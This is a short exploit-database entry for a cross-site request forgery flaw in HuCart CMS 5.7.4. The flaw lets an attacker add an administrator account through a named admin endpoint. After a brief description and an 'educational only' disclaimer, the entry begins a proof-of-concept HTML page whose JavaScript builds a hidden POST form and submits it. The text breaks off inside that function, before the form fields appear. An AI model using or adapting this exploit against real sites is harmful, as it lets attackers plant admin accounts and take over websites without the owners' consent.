Exploits / Vulnerability Discovered : 2019-01-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Hucart cms 5.7.4 crosssite request forgery (add administrator account) is for educational purposes only and if it is used you will do on your own risk!
An issue was discovered in HuCart v5.7.4. There is a CSRF vulnerability that can add an admin account via /adminsys/index.php?load=admins&act=edit_info&act_type=add.(References:http://www.iwantacve.cn/index.php/archives/109/)
After the administrator logged in, open the csrf exp page.
-->
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;